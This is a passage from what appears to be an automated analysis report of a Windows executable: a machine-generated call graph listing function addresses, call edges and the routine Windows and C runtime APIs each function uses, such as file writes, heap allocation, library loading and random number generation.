7ff7cf8b8eec 48 API calls 38467->38471 38473 7ff7cf88b0fc 38471->38473 38475 7ff7cf8b8eec 48 API calls 38473->38475 38477 7ff7cf88b109 38475->38477 38476 7ff7cf8b8e3c 48 API calls 38478 7ff7cf88ae80 38476->38478 38479 7ff7cf88b11f 38477->38479 38481 7ff7cf8b8eec 48 API calls 38477->38481 38480 7ff7cf8b8f94 126 API calls 38478->38480 38607 7ff7cf8b8e94 38479->38607 38480->38405 38481->38479 38484 7ff7cf8b8eec 48 API calls 38485 7ff7cf88b147 38484->38485 38486 7ff7cf8b8e94 48 API calls 38485->38486 38487 7ff7cf88b15f 38486->38487 38488 7ff7cf8b8eec 48 API calls 38487->38488 38491 7ff7cf88b16c 38488->38491 38489 7ff7cf88b18a 38490 7ff7cf88b1a9 38489->38490 38618 7ff7cf8b8d88 48 API calls 38489->38618 38493 7ff7cf8b8e94 48 API calls 38490->38493 38491->38489 38617 7ff7cf8b8d88 48 API calls 38491->38617 38495 7ff7cf88b1bc 38493->38495 38496 7ff7cf8b8eec 48 API calls 38495->38496 38497 7ff7cf88b1d6 38496->38497 38499 7ff7cf88b1e9 38497->38499 38619 7ff7cf88c3c8 CharLowerW CharUpperW 38497->38619 38499->38499 38500 7ff7cf8b8eec 48 API calls 38499->38500 38501 7ff7cf88b21f 38500->38501 38502 7ff7cf8b8e3c 48 API calls 38501->38502 38503 7ff7cf88b230 38502->38503 38504 7ff7cf8b8e3c 48 API calls 38503->38504 38506 7ff7cf88b247 38503->38506 38504->38506 38505 7ff7cf8b8f94 126 API calls 38507 7ff7cf88b278 38505->38507 38506->38505 38507->38405 38620 7ff7cf8b70d8 4 API calls 2 library calls 38507->38620 38663 7ff7cf8b8f28 38509->38663 38512 7ff7cf8990b8 38513 7ff7cf899123 38512->38513 38525 7ff7cf8991a9 38512->38525 38513->38525 38681 7ff7cf8c7e74 38513->38681 38514 7ff7cf8da610 _handle_error 8 API calls 38516 7ff7cf88b66e 38514->38516 38528 7ff7cf8a2574 38516->38528 38518 7ff7cf8cd840 WideCharToMultiByte 38519 7ff7cf899157 38518->38519 38520 7ff7cf8991c4 38519->38520 38521 7ff7cf89916a 38519->38521 38519->38525 38700 7ff7cf899338 12 API calls _handle_error 38520->38700 38522 7ff7cf89916f 38521->38522 38523 7ff7cf8991ab 38521->38523 38522->38525 38685 7ff7cf8998b0 38522->38685 38699 7ff7cf89951c 71 API calls _handle_error 38523->38699 38525->38514 38529 7ff7cf8a25a5 38528->38529 38530 7ff7cf8a259e 38528->38530 38531 7ff7cf8a25ab GetStdHandle 38529->38531 38536 7ff7cf8a25ba 38529->38536 38530->38258 38531->38536 38532 7ff7cf8a2619 WriteFile 38532->38536 38533 7ff7cf8a25cf WriteFile 38534 7ff7cf8a260b 38533->38534 38533->38536 38534->38533 38534->38536 38535 7ff7cf8a2658 GetLastError 38535->38536 38536->38530 38536->38532 38536->38533 38536->38535 38541 7ff7cf8a2721 38536->38541 38797 7ff7cf8a3144 9 API calls 2 library calls 38536->38797 38798 7ff7cf89cf34 10 API calls 38536->38798 38799 7ff7cf89c95c 126 API calls 38536->38799 38538 7ff7cf8a2684 SetLastError 38538->38536 38800 7ff7cf89cf14 10 API calls 38541->38800 38544 7ff7cf88161c 48 API calls 38543->38544 38545 7ff7cf88b719 38544->38545 38546 7ff7cf8b8d38 48 API calls 38545->38546 38546->38281 38547->38283 38548->38284 38549->38291 38551 7ff7cf8b9131 38550->38551 38552 7ff7cf8b8fcf 38550->38552 38551->38255 38558 7ff7cf8b905d 38552->38558 38801 7ff7cf89ca6c 48 API calls 3 library calls 38552->38801 38553 7ff7cf8a2574 126 API calls 38553->38551 38554 7ff7cf88161c 48 API calls 38555 7ff7cf8b90e0 38554->38555 38555->38551 38555->38553 38557 7ff7cf8b904c 38802 7ff7cf89ca40 61 API calls _CxxThrowException 38557->38802 38558->38554 38558->38555 38560->38292 38562 7ff7cf88b8f8 CharToOemA 38561->38562 38562->38301 38563->38296 38564->38302 38565->38304 38566->38306 38567->38308 38568->38312 38569->38313 38570->38316 38571->38322 38572->38324 38573->38327 38574->38325 38576 7ff7cf88161c 48 API calls 38575->38576 38577 7ff7cf88baf2 38576->38577 38577->38331 38577->38333 38577->38337 38578->38270 38579->38273 38580->38276 38581->38260 38626 7ff7cf89901c CryptAcquireContextW 38582->38626 38586 7ff7cf899c2a 38587 7ff7cf8c9ce4 8 API calls 38586->38587 38588 7ff7cf899c49 38587->38588 38589 7ff7cf8c9b70 8 API calls 38588->38589 38590 7ff7cf899c5b memcpy_s 38589->38590 38591 7ff7cf8da610 _handle_error 8 API calls 38590->38591 38592 7ff7cf88ac34 38591->38592 38592->38415 38595 7ff7cf8b8efc 38593->38595 38594 7ff7cf8b8d00 48 API calls 38594->38595 38595->38594 38596 7ff7cf88ad24 38595->38596 38596->38432 38598 7ff7cf88ae60 38597->38598 38599 7ff7cf8c9d15 memcpy_s 38597->38599 38601 7ff7cf8c9b70 38598->38601 38599->38598 38642 7ff7cf8c9d74 38599->38642 38602 7ff7cf8c9bd9 memcpy_s 38601->38602 38605 7ff7cf8c9bad memcpy_s 38601->38605 38603 7ff7cf8c9d74 8 API calls 38602->38603 38604 7ff7cf88ae6d 38603->38604 38604->38476 38605->38602 38606 7ff7cf8c9d74 8 API calls 38605->38606 38606->38602 38608 7ff7cf8b8eac 38607->38608 38609 7ff7cf8b8d00 48 API calls 38608->38609 38610 7ff7cf88b137 38608->38610 38609->38608 38610->38484 38611->38451 38612->38459 38613->38461 38614->38460 38615->38465 38616->38467 38617->38489 38618->38490 38619->38499 38620->38405 38621->38416 38623 7ff7cf8b72dd 38622->38623 38624 7ff7cf8b7304 38623->38624 38646 7ff7cf8da480 38623->38646 38624->38405 38627 7ff7cf899057 CryptGenRandom CryptReleaseContext 38626->38627 38628 7ff7cf89907e 38626->38628 38627->38628 38629 7ff7cf899089 38627->38629 38630 7ff7cf899c9c 11 API calls 38628->38630 38631 7ff7cf899c9c 38629->38631 38630->38629 38636 7ff7cf8cc0a8 GetSystemTime SystemTimeToFileTime 38631->38636 38633 7ff7cf899cc5 38639 7ff7cf8e2d74 38633->38639 38637 7ff7cf8da610 _handle_error 8 API calls 38636->38637 38638 7ff7cf8cc0f1 38637->38638 38638->38633 38640 7ff7cf8e2d8b QueryPerformanceCounter 38639->38640 38641 7ff7cf899cd7 38639->38641 38640->38641 38641->38586 38643 7ff7cf8c9dbc 38642->38643 38643->38643 38644 7ff7cf8da610 _handle_error 8 API calls 38643->38644 38645 7ff7cf8c9f40 38644->38645 38645->38599 38647 7ff7cf8da444 38646->38647 38648 7ff7cf8da47a 38647->38648 38652 7ff7cf8e36c0 38647->38652 38655 7ff7cf8db314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38647->38655 38656 7ff7cf8db2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38647->38656 38648->38624 38657 7ff7cf8e3700 38652->38657 38662 7ff7cf8e6938 EnterCriticalSection 38657->38662 38659 7ff7cf8e370d 38660 7ff7cf8e6998 fflush LeaveCriticalSection 38659->38660 38661 7ff7cf8e36d2 38660->38661 38661->38647 38666 7ff7cf88161c 38663->38666 38665 7ff7cf88b601 38665->38258 38665->38260 38665->38512 38668 7ff7cf881640 38666->38668 38676 7ff7cf8816aa memcpy_s 38666->38676 38667 7ff7cf88166d 38671 7ff7cf88168e 38667->38671 38673 7ff7cf8816d4 38667->38673 38668->38667 38677 7ff7cf89ca6c 48 API calls 3 library calls 38668->38677 38670 7ff7cf881661 38678 7ff7cf89cb64 8 API calls 38670->38678 38671->38676 38679 7ff7cf89cb64 8 API calls 38671->38679 38673->38676 38680 7ff7cf89cb64 8 API calls 38673->38680 38676->38665 38677->38670 38682 7ff7cf899143 38681->38682 38683 7ff7cf8c7e95 38681->38683 38682->38518 38701 7ff7cf8c7ec8 38683->38701 38686 7ff7cf899b45 38685->38686 38690 7ff7cf899920 38685->38690 38687 7ff7cf8da610 _handle_error 8 API calls 38686->38687 38688 7ff7cf899b61 38687->38688 38688->38525 38691 7ff7cf89996d 38690->38691 38692 7ff7cf899b75 38690->38692 38733 7ff7cf8c7da8 38690->38733 38691->38691 38740 7ff7cf89a0f4 38691->38740 38694 7ff7cf8c7f24 68 API calls 38692->38694 38696 7ff7cf899acb 38694->38696 38695 7ff7cf8999d0 38695->38695 38756 7ff7cf8c7f24 38695->38756 38696->38686 38770 7ff7cf8c4ea8 8 API calls _handle_error 38696->38770 38699->38525 38700->38525 38702 7ff7cf8c7efa memcpy_s 38701->38702 38706 7ff7cf8c7fb5 38702->38706 38715 7ff7cf8cb3f0 38702->38715 38705 7ff7cf8c805c GetCurrentProcessId 38708 7ff7cf8c8034 38705->38708 38706->38705 38709 7ff7cf8c7ff1 38706->38709 38707 7ff7cf8c7f7e GetProcAddressForCaller GetProcAddress 38707->38706 38708->38682 38709->38708 38724 7ff7cf89ca6c 48 API calls 3 library calls 38709->38724 38711 7ff7cf8c801f 38725 7ff7cf89cda4 10 API calls 2 library calls 38711->38725 38713 7ff7cf8c8027 38726 7ff7cf89ca40 61 API calls _CxxThrowException 38713->38726 38727 7ff7cf8da5a0 38715->38727 38718 7ff7cf8cb42c 38729 7ff7cf8b48bc 38718->38729 38719 7ff7cf8cb428 38722 7ff7cf8da610 _handle_error 8 API calls 38719->38722 38723 7ff7cf8c7f72 38722->38723 38723->38706 38723->38707 38724->38711 38725->38713 38726->38708 38728 7ff7cf8cb3fc GetSystemDirectoryW 38727->38728 38728->38718 38728->38719 38730 7ff7cf8b48cb setbuf 38729->38730 38731 7ff7cf8da610 _handle_error 8 API calls 38730->38731 38732 7ff7cf8b493a LoadLibraryExW 38731->38732 38732->38719 38734 7ff7cf8c7e74 68 API calls 38733->38734 38735 7ff7cf8c7ddc 38734->38735 38736 7ff7cf8c7e74 68 API calls 38735->38736 38737 7ff7cf8c7def 38736->38737 38738 7ff7cf8da610 _handle_error 8 API calls 38737->38738 38739 7ff7cf8c7e43 38738->38739 38739->38690 38741 7ff7cf89a15c memcpy_s 38740->38741 38742 7ff7cf89a358 38741->38742 38744 7ff7cf89a352 38741->38744 38747 7ff7cf89a192 38741->38747 38748 7ff7cf89a34d 38741->38748 38793 7ff7cf8da774 8 API calls __report_securityfailure 38742->38793 38792 7ff7cf8da774 8 API calls __report_securityfailure 38744->38792 38746 7ff7cf89a35e 38771 7ff7cf899dd8 38747->38771 38791 7ff7cf8da774 8 API calls __report_securityfailure 38748->38791 38751 7ff7cf89a1d9 38752 7ff7cf899dd8 8 API calls 38751->38752 38753 7ff7cf89a2f1 38751->38753 38752->38751 38754 7ff7cf8da610 _handle_error 8 API calls 38753->38754 38755 7ff7cf89a33b 38754->38755 38755->38695 38757 7ff7cf8c7f5e 38756->38757 38761 7ff7cf8c7fb5 38756->38761 38758 7ff7cf8cb3f0 10 API calls 38757->38758 38757->38761 38759 7ff7cf8c7f72 38758->38759 38759->38761 38762 7ff7cf8c7f7e GetProcAddressForCaller GetProcAddress 38759->38762 38760 7ff7cf8c805c GetCurrentProcessId 38763 7ff7cf8c8034 38760->38763 38761->38760 38764 7ff7cf8c7ff1 38761->38764 38762->38761 38763->38696 38764->38763 38794 7ff7cf89ca6c 48 API calls 3 library calls 38764->38794 38766 7ff7cf8c801f 38795 7ff7cf89cda4 10 API calls 2 library calls 38766->38795 38768 7ff7cf8c8027 38796 7ff7cf89ca40 61 API calls _CxxThrowException 38768->38796 38770->38686 38772 7ff7cf899e46 38771->38772 38773 7ff7cf899e6e memcpy_s 38771->38773 38774 7ff7cf8c9ce4 8 API calls 38772->38774 38777 7ff7cf899e85 38773->38777 38780 7ff7cf8c9ce4 8 API calls 38773->38780 38775 7ff7cf899e5e 38774->38775 38776 7ff7cf8c9b70 8 API calls 38775->38776 38776->38773 38778 7ff7cf8c9ce4 8 API calls 38777->38778 38779 7ff7cf899f97 38778->38779 38781 7ff7cf8c9b70 8 API calls 38779->38781 38780->38777 38782 7ff7cf899fa8 memcpy_s 38781->38782 38783 7ff7cf899fb4 38782->38783 38785 7ff7cf8c9ce4 8 API calls 38782->38785 38784 7ff7cf8c9ce4 8 API calls 38783->38784 38786 7ff7cf89a0bb 38784->38786 38785->38783 38787 7ff7cf8c9b70 8 API calls 38786->38787 38788 7ff7cf89a0c9 38787->38788 38789 7ff7cf8da610 _handle_error 8 API calls 38788->38789 38790 7ff7cf89a0d8 38789->38790 38790->38751 38791->38744 38792->38742 38793->38746 38794->38766 38795->38768 38796->38763 38797->38538 38799->38536 38801->38557 38802->38558 38804 7ff7cf8a1c37 38803->38804 38805 7ff7cf8a1c3b 38803->38805 38804->38344 38805->38804 38806 7ff7cf8a1c5d 38805->38806 38814 7ff7cf8a2d6c 12 API calls 2 library calls 38806->38814 38809 7ff7cf8a194c 38808->38809 38812 7ff7cf8a1964 38808->38812 38811 7ff7cf8a1958 CloseHandle 38809->38811 38809->38812 38810 7ff7cf8a1988 38810->38344 38811->38812 38812->38810 38815 7ff7cf89c9d0 10 API calls 38812->38815 38814->38804 38815->38810 38816->38358 38818 7ff7cf8ca924 38820 7ff7cf8ca949 snprintf 38818->38820 38819 7ff7cf8ca97f CompareStringA 38820->38819 38821 7ff7cf8e9c74 38822 7ff7cf8e9c7c 38821->38822 38823 7ff7cf8e9cbb 38822->38823 38824 7ff7cf8e9cac 38822->38824 38825 7ff7cf8e9cc5 38823->38825 38843 7ff7cf8ece08 32 API calls 2 library calls 38823->38843 38842 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 38824->38842 38830 7ff7cf8e4b8c 38825->38830 38829 7ff7cf8e9cb1 memcpy_s 38831 7ff7cf8e4ba1 38830->38831 38832 7ff7cf8e4bab 38830->38832 38844 7ff7cf8e4ab4 38831->38844 38834 7ff7cf8e4bb0 38832->38834 38840 7ff7cf8e4bb7 __vcrt_getptd_noexit 38832->38840 38851 7ff7cf8e4a74 38834->38851 38835 7ff7cf8e4bf6 38857 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 38835->38857 38837 7ff7cf8e4ba9 38837->38829 38838 7ff7cf8e4be0 RtlReAllocateHeap 38838->38837 38838->38840 38840->38835 38840->38838 38841 7ff7cf8e36c0 new 2 API calls 38840->38841 38841->38840 38842->38829 38843->38825 38845 7ff7cf8e4aff 38844->38845 38849 7ff7cf8e4ac3 __vcrt_getptd_noexit 38844->38849 38858 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 38845->38858 38846 7ff7cf8e4ae6 RtlAllocateHeap 38848 7ff7cf8e4afd 38846->38848 38846->38849 38848->38837 38849->38845 38849->38846 38850 7ff7cf8e36c0 new 2 API calls 38849->38850 38850->38849 38852 7ff7cf8e4a79 RtlFreeHeap 38851->38852 38856 7ff7cf8e4aa9 __free_lconv_num 38851->38856 38853 7ff7cf8e4a94 38852->38853 38852->38856 38859 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 38853->38859 38855 7ff7cf8e4a99 GetLastError 38855->38856 38856->38837 38857->38837 38858->38848 38859->38855 38860 7ff7cf887a5b 38861 7ff7cf887a60 38860->38861 38862 7ff7cf899be0 14 API calls 38861->38862 38863 7ff7cf887af7 38861->38863 38862->38863 38864 7ff7cf887bda 38863->38864 38893 7ff7cf8a1e1c GetFileTime 38863->38893 38865 7ff7cf88b540 147 API calls 38864->38865 38867 7ff7cf887bf8 38865->38867 38870 7ff7cf887c3e 38867->38870 38894 7ff7cf8d9b98 216 API calls 3 library calls 38867->38894 38869 7ff7cf88b540 147 API calls 38872 7ff7cf887c9c 38869->38872 38870->38869 38871 7ff7cf887f89 38872->38871 38895 7ff7cf8a6378 38872->38895 38874 7ff7cf887cd7 38875 7ff7cf8a6378 4 API calls 38874->38875 38877 7ff7cf887cf3 38875->38877 38876 7ff7cf887de1 38883 7ff7cf887e4e 38876->38883 38906 7ff7cf8b98dc 38876->38906 38877->38876 38878 7ff7cf887d59 38877->38878 38879 7ff7cf887d38 38877->38879 38882 7ff7cf8da444 new 4 API calls 38878->38882 38899 7ff7cf8da444 38879->38899 38887 7ff7cf887d42 std::bad_alloc::bad_alloc 38882->38887 38912 7ff7cf881204 48 API calls 38883->38912 38885 7ff7cf887eb3 38888 7ff7cf887edb 38885->38888 38913 7ff7cf8b9680 38885->38913 38887->38876 38905 7ff7cf8dba34 RtlPcToFileHeader RaiseException 38887->38905 38919 7ff7cf8a6424 8 API calls _handle_error 38888->38919 38890 7ff7cf887f56 38892 7ff7cf88b540 147 API calls 38890->38892 38892->38871 38893->38864 38894->38870 38896 7ff7cf8a6396 38895->38896 38898 7ff7cf8a63a0 38895->38898 38897 7ff7cf8da444 new 4 API calls 38896->38897 38897->38898 38898->38874 38902 7ff7cf8da44f 38899->38902 38900 7ff7cf8da47a 38900->38887 38901 7ff7cf8e36c0 new 2 API calls 38901->38902 38902->38900 38902->38901 38920 7ff7cf8db314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38902->38920 38921 7ff7cf8db2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38902->38921 38905->38876 38907 7ff7cf8b9926 38906->38907 38908 7ff7cf8b993c 38906->38908 38909 7ff7cf8990b8 75 API calls 38907->38909 38910 7ff7cf8990b8 75 API calls 38908->38910 38911 7ff7cf8b9934 38909->38911 38910->38911 38911->38883 38912->38885 38917 7ff7cf8b96a4 38913->38917 38914 7ff7cf8b97d7 38915 7ff7cf8a2574 126 API calls 38915->38917 38917->38914 38917->38915 38918 7ff7cf8d9b98 216 API calls 38917->38918 38922 7ff7cf8a6498 72 API calls new 38917->38922 38918->38917 38919->38890 38922->38917 38923 7ff7cf8e2450 38930 7ff7cf8e3734 38923->38930 38925 7ff7cf8e2455 38926 7ff7cf8e6998 fflush LeaveCriticalSection 38925->38926 38927 7ff7cf8e2460 38926->38927 38928 7ff7cf8e246c 38927->38928 38929 7ff7cf8e2488 11 API calls 38927->38929 38929->38928 38935 7ff7cf8e5630 35 API calls 4 library calls 38930->38935 38932 7ff7cf8e373f 38936 7ff7cf8e4a1c 35 API calls abort 38932->38936 38935->38932 38937 7ff7cf8cbb70 38940 7ff7cf8cbb80 38937->38940 38949 7ff7cf8cbae8 38940->38949 38942 7ff7cf8cbb79 38944 7ff7cf8cbbd5 LeaveCriticalSection 38946 7ff7cf8cbae8 67 API calls 38944->38946 38945 7ff7cf8cbbc8 SetEvent 38945->38944 38947 7ff7cf8cbb97 38946->38947 38947->38942 38954 7ff7cf891690 38947->38954 38958 7ff7cf8cb974 WaitForSingleObject 38949->38958 38952 7ff7cf8cbb16 EnterCriticalSection LeaveCriticalSection 38953 7ff7cf8cbb12 38952->38953 38953->38947 38955 7ff7cf8916c2 EnterCriticalSection 38954->38955 38956 7ff7cf8916a4 38954->38956 38955->38944 38955->38945 38956->38955 38966 7ff7cf891180 38956->38966 38959 7ff7cf8cb986 GetLastError 38958->38959 38960 7ff7cf8cb9b7 38958->38960 38964 7ff7cf89ca6c 48 API calls 3 library calls 38959->38964 38960->38952 38960->38953 38962 7ff7cf8cb9a6 38965 7ff7cf89ca40 61 API calls _CxxThrowException 38962->38965 38964->38962 38965->38960 38967 7ff7cf8911ab 38966->38967 38971 7ff7cf8911b0 38966->38971 38976 7ff7cf8917c8 216 API calls 2 library calls 38967->38976 38969 7ff7cf89166a 38969->38956 38970 7ff7cf8b6d38 216 API calls 38970->38971 38971->38969 38971->38970 38972 7ff7cf891080 48 API calls 38971->38972 38973 7ff7cf8b6fe8 216 API calls 38971->38973 38975 7ff7cf8b6e90 216 API calls 38971->38975 38977 7ff7cf8917c8 216 API calls 2 library calls 38971->38977 38972->38971 38973->38971 38975->38971 38976->38971 38977->38971 38978 7ff7cf8db0fc 38997 7ff7cf8daa8c 38978->38997 38982 7ff7cf8db123 __scrt_acquire_startup_lock 38983 7ff7cf8db148 38982->38983 39053 7ff7cf8db52c 7 API calls memcpy_s 38982->39053 38987 7ff7cf8db169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38983->38987 39005 7ff7cf8e472c 38983->39005 38986 7ff7cf8db16d 38987->38986 38988 7ff7cf8db1f7 38987->38988 39054 7ff7cf8e2574 35 API calls __InternalCxxFrameHandler 38987->39054 39009 7ff7cf8e3fc4 38988->39009 38995 7ff7cf8db220 39055 7ff7cf8dac64 8 API calls 2 library calls 38995->39055 38998 7ff7cf8daaae __isa_available_init 38997->38998 39056 7ff7cf8de2f8 38998->39056 39001 7ff7cf8daab7 39001->38982 39052 7ff7cf8db52c 7 API calls memcpy_s 39001->39052 39007 7ff7cf8e4744 39005->39007 39006 7ff7cf8e4766 39006->38987 39007->39006 39105 7ff7cf8db010 39007->39105 39010 7ff7cf8e3fd4 39009->39010 39011 7ff7cf8db20c 39009->39011 39189 7ff7cf8e3c84 54 API calls 39010->39189 39013 7ff7cf8b7e20 39011->39013 39190 7ff7cf8cb470 GetModuleHandleW 39013->39190 39019 7ff7cf8b7e58 SetErrorMode GetModuleHandleW 39020 7ff7cf8c48cc 21 API calls 39019->39020 39021 7ff7cf8b7e7d 39020->39021 39022 7ff7cf8c3e48 137 API calls 39021->39022 39023 7ff7cf8b7e90 39022->39023 39024 7ff7cf893d3c 126 API calls 39023->39024 39025 7ff7cf8b7e9c 39024->39025 39026 7ff7cf8da444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39025->39026 39027 7ff7cf8b7ead 39026->39027 39028 7ff7cf8b7ebf 39027->39028 39029 7ff7cf893f18 70 API calls 39027->39029 39030 7ff7cf894d1c 157 API calls 39028->39030 39029->39028 39031 7ff7cf8b7ed6 39030->39031 39032 7ff7cf8b7eef 39031->39032 39033 7ff7cf896ad0 154 API calls 39031->39033 39034 7ff7cf894d1c 157 API calls 39032->39034 39035 7ff7cf8b7ee7 39033->39035 39036 7ff7cf8b7eff 39034->39036 39037 7ff7cf894e48 160 API calls 39035->39037 39038 7ff7cf8b7f0d 39036->39038 39040 7ff7cf8b7f14 39036->39040 39037->39032 39039 7ff7cf8cb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39038->39039 39039->39040 39041 7ff7cf894888 58 API calls 39040->39041 39042 7ff7cf8b7f57 39041->39042 39043 7ff7cf894fd0 268 API calls 39042->39043 39044 7ff7cf8b7f5f 39043->39044 39045 7ff7cf8b7f9e 39044->39045 39046 7ff7cf8b7f8c 39044->39046 39050 7ff7cf8db684 GetModuleHandleW 39045->39050 39047 7ff7cf8cb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39046->39047 39048 7ff7cf8b7f93 39047->39048 39048->39045 39049 7ff7cf8cb57c 14 API calls 39048->39049 39049->39045 39051 7ff7cf8db698 39050->39051 39051->38995 39052->38982 39053->38983 39054->38988 39055->38986 39057 7ff7cf8de301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39056->39057 39069 7ff7cf8deb08 39057->39069 39060 7ff7cf8daab3 39060->39001 39064 7ff7cf8e45e4 39060->39064 39062 7ff7cf8de318 39062->39060 39076 7ff7cf8deb50 DeleteCriticalSection 39062->39076 39065 7ff7cf8e9d4c 39064->39065 39066 7ff7cf8daac0 39065->39066 39093 7ff7cf8e66c0 39065->39093 39066->39001 39068 7ff7cf8de32c 8 API calls 3 library calls 39066->39068 39068->39001 39070 7ff7cf8deb10 39069->39070 39072 7ff7cf8deb41 39070->39072 39073 7ff7cf8de30b 39070->39073 39077 7ff7cf8de678 39070->39077 39082 7ff7cf8deb50 DeleteCriticalSection 39072->39082 39073->39060 39075 7ff7cf8de8a4 8 API calls 3 library calls 39073->39075 39075->39062 39076->39060 39083 7ff7cf8de34c 39077->39083 39080 7ff7cf8de6cf InitializeCriticalSectionAndSpinCount 39081 7ff7cf8de6bb 39080->39081 39081->39070 39082->39073 39084 7ff7cf8de3b2 39083->39084 39089 7ff7cf8de3ad 39083->39089 39084->39080 39084->39081 39085 7ff7cf8de47a 39085->39084 39088 7ff7cf8de489 GetProcAddress 39085->39088 39086 7ff7cf8de3e5 LoadLibraryExW 39087 7ff7cf8de40b GetLastError 39086->39087 39086->39089 39087->39089 39090 7ff7cf8de416 LoadLibraryExW 39087->39090 39088->39084 39091 7ff7cf8de4a1 39088->39091 39089->39084 39089->39085 39089->39086 39092 7ff7cf8de458 FreeLibrary 39089->39092 39090->39089 39091->39084 39092->39089 39104 7ff7cf8e6938 EnterCriticalSection 39093->39104 39095 7ff7cf8e66d0 39096 7ff7cf8e8050 32 API calls 39095->39096 39097 7ff7cf8e66d9 39096->39097 39098 7ff7cf8e66e7 39097->39098 39100 7ff7cf8e64d0 34 API calls 39097->39100 39099 7ff7cf8e6998 fflush LeaveCriticalSection 39098->39099 39101 7ff7cf8e66f3 39099->39101 39102 7ff7cf8e66e2 39100->39102 39101->39065 39103 7ff7cf8e65bc GetStdHandle GetFileType 39102->39103 39103->39098 39106 7ff7cf8db020 pre_c_initialization 39105->39106 39126 7ff7cf8e2b00 39106->39126 39108 7ff7cf8db02c pre_c_initialization 39132 7ff7cf8daad8 39108->39132 39110 7ff7cf8db045 39111 7ff7cf8db0b5 39110->39111 39113 7ff7cf8db049 _RTC_Initialize 39110->39113 39168 7ff7cf8db52c 7 API calls memcpy_s 39111->39168 39137 7ff7cf8dace0 39113->39137 39114 7ff7cf8db0bf 39169 7ff7cf8db52c 7 API calls memcpy_s 39114->39169 39117 7ff7cf8db05a pre_c_initialization 39140 7ff7cf8e3b0c 39117->39140 39118 7ff7cf8db0ca __scrt_initialize_default_local_stdio_options 39118->39007 39121 7ff7cf8db06a 39167 7ff7cf8db7dc RtlInitializeSListHead 39121->39167 39127 7ff7cf8e2b11 39126->39127 39130 7ff7cf8e2b19 39127->39130 39170 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 39127->39170 39129 7ff7cf8e2b28 39171 7ff7cf8e4e1c 31 API calls _invalid_parameter_noinfo 39129->39171 39130->39108 39133 7ff7cf8dab96 39132->39133 39136 7ff7cf8daaf0 __scrt_initialize_onexit_tables 39132->39136 39172 7ff7cf8db52c 7 API calls memcpy_s 39133->39172 39135 7ff7cf8daba0 39136->39110 39173 7ff7cf8dac90 39137->39173 39139 7ff7cf8dace9 39139->39117 39141 7ff7cf8e3b40 39140->39141 39142 7ff7cf8e3b2a 39140->39142 39178 7ff7cf8e9370 39141->39178 39182 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 39142->39182 39145 7ff7cf8e3b2f 39183 7ff7cf8e4e1c 31 API calls _invalid_parameter_noinfo 39145->39183 39148 7ff7cf8e3b72 39184 7ff7cf8e38ec 35 API calls pre_c_initialization 39148->39184 39150 7ff7cf8e3b9c 39185 7ff7cf8e3aa8 15 API calls 2 library calls 39150->39185 39152 7ff7cf8e3bb2 39153 7ff7cf8e3bcb 39152->39153 39154 7ff7cf8e3bba 39152->39154 39187 7ff7cf8e38ec 35 API calls pre_c_initialization 39153->39187 39186 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 39154->39186 39157 7ff7cf8e4a74 __free_lconv_num 15 API calls 39166 7ff7cf8db066 39157->39166 39158 7ff7cf8e3be7 39159 7ff7cf8e3c30 39158->39159 39160 7ff7cf8e3c17 39158->39160 39164 7ff7cf8e3bbf 39158->39164 39162 7ff7cf8e4a74 __free_lconv_num 15 API calls 39159->39162 39161 7ff7cf8e4a74 __free_lconv_num 15 API calls 39160->39161 39163 7ff7cf8e3c20 39161->39163 39162->39164 39165 7ff7cf8e4a74 __free_lconv_num 15 API calls 39163->39165 39164->39157 39165->39166 39166->39114 39166->39121 39168->39114 39169->39118 39170->39129 39171->39130 39172->39135 39174 7ff7cf8dacbf 39173->39174 39176 7ff7cf8dacb5 _onexit 39173->39176 39177 7ff7cf8e4434 34 API calls _onexit 39174->39177 39176->39139 39177->39176 39179 7ff7cf8e3b45 GetModuleFileNameA 39178->39179 39180 7ff7cf8e937d 39178->39180 39179->39148 39188 7ff7cf8e91b0 48 API calls 5 library calls 39180->39188 39182->39145 39183->39166 39184->39150 39185->39152 39186->39164 39187->39158 39188->39179 39189->39011 39191 7ff7cf8cb496 GetProcAddress 39190->39191 39192 7ff7cf8b7e45 39190->39192 39193 7ff7cf8cb4cb GetProcAddress 39191->39193 39194 7ff7cf8cb4ae 39191->39194 39195 7ff7cf897a68 39192->39195 39193->39192 39194->39193 39196 7ff7cf897a76 39195->39196 39216 7ff7cf8e2ae4 39196->39216 39198 7ff7cf897a80 39199 7ff7cf8e2ae4 setbuf 60 API calls 39198->39199 39200 7ff7cf897a94 39199->39200 39225 7ff7cf897b44 GetStdHandle GetFileType 39200->39225 39203 7ff7cf897b44 3 API calls 39204 7ff7cf897aae 39203->39204 39205 7ff7cf897b44 3 API calls 39204->39205 39207 7ff7cf897abe 39205->39207 39206 7ff7cf897b12 39215 7ff7cf89cd78 SetConsoleCtrlHandler 39206->39215 39209 7ff7cf897aeb 39207->39209 39228 7ff7cf8e2abc 31 API calls 2 library calls 39207->39228 39209->39206 39230 7ff7cf8e2abc 31 API calls 2 library calls 39209->39230 39210 7ff7cf897adf 39229 7ff7cf8e2b40 33 API calls 3 library calls 39210->39229 39213 7ff7cf897b06 39231 7ff7cf8e2b40 33 API calls 3 library calls 39213->39231 39217 7ff7cf8e2ae9 39216->39217 39218 7ff7cf8e7ee8 39217->39218 39221 7ff7cf8e7f23 39217->39221 39232 7ff7cf8e4f3c 15 API calls _invalid_parameter_noinfo 39218->39232 39220 7ff7cf8e7eed 39233 7ff7cf8e4e1c 31 API calls _invalid_parameter_noinfo 39220->39233 39234 7ff7cf8e7d98 60 API calls 2 library calls 39221->39234 39224 7ff7cf8e7ef8 39224->39198 39226 